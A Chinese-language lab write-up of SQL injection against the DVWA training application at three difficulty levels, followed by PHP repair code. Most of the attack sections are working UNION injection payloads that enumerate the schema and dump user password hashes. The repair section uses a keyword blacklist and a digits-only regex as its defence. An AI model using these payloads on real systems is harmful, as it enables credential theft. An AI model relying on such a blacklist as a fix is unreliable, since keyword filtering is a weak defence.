[dvwa] sql injection

sql injection

0x01 low

sql语句没有过滤

经典注入，通过逻辑or为真相当于select * from users where true，99换成1也成

用union select 对齐列数，查看数据库信息

1’ union select 1,2#

order by探测对齐列数更方便

1’ or 1=1 order by 1,2#

比union select多一个判断

考虑编码

1’ union select 1,group_concat(table_name) COLLATE utf8_general_ci from information_schema.tables where table_schema=‘dvwa’#

还得是stack overflow nb https://stackoverflow.com/questions/20456152/mysql-error-illegal-mix-of-collations-for-operation-union

表guestbook, users

1’ union select 1,group_concat(column_name) COLLATE utf8_general_ci from information_schema.columns where table_name=‘users’#

列: user_id,first_name,last_name,user,password,avatar,last_login,failed_login

1’ union select group_concat(user_id),group_concat(password) COLLATE utf8_general_ci from dvwa.users #

1’ or 1=1 union select group_concat(user_id),group_concat(password) COLLATE utf8_general_ci from dvwa.users #

拿到密码

和直接在数据库中看到的一致

0x02 medium

从select元素中获取值，提交，显示

抓包观察，修改，发现存在注入

数字型注入

order by 3 报错，说明有两列select

1 union select 1, group_concat(table_schema) COLLATE utf8_general_ci from information_schema.tables where table_schema = database()

1 union select 1, group_concat(table_name) COLLATE utf8_general_ci from information_schema.tables where table_schema = database()#

id=1 union select 1, group_concat(column_name) COLLATE utf8_general_ci from information_schema.columns where table_name = 0x7573657273#

1 or 1=1 union select group_concat(user_id),group_concat(password) from users

搞定

数字型注入，单引号被过滤

0x03 high

使用limit 1限制显示，使用#注释即可

输入和回显不在同一页面可防止sqlmap攻击

1’ union select 1,group_concat(table_name) COLLATE utf8_general_ci from information_schema.tables where table_schema = ‘dvwa’#

1’ union select 1,group_concat(column_name) COLLATE utf8_general_ci from information_schema.columns where table_name = ‘users’#

1’ union select group_concat(user_id),group_concat(password) COLLATE utf8_general_ci from users #

0x04 Repair 漏洞修复

修复漏洞，同时保证保证功能完整

0x0401 Chars 字符型

过滤关键字，发现不合规的输入就die终止

使用str_replace要优于preg_replace，它将所有的$search替换为$replace，$count显示替换的次数

非法输入

不可以打哦

详细代码

$suspects = array("'"," ","and","or","union","select","#","\\",";","order","by","--","\"");
$allnull = array();
for ($i = 0;$i<count($suspects);$i += 1){
  array_push($allnull,'Hacker');
}
$count = 0;
$id = $_REQUEST[ 'id' ];
$id = str_replace($suspects,$allnull,$id,$count);
if($count>0){
  die("no, can not hack");
}

0x0402 Numbers 数字型

intival将串转为数字，is_numberic判断串是否为数字

用正则匹配所有数字，提取出来重新组成串

这个串中只有数字，如果抓包修改为id=3 or 1=1那么id会变成311。虽然是一个不合法的数据，也可以阻止了union select恶意查询

打开注释内容，更有效。它检测到非数字就会die终止程序

//  $judge = is_numeric($id);
//  if($judge== false){
//    die("sorry, can not pass");
//  }
  preg_match_all('!\d+!', $id, $matches);
  $numbers = $matches[0];
  $id  = implode('',$numbers);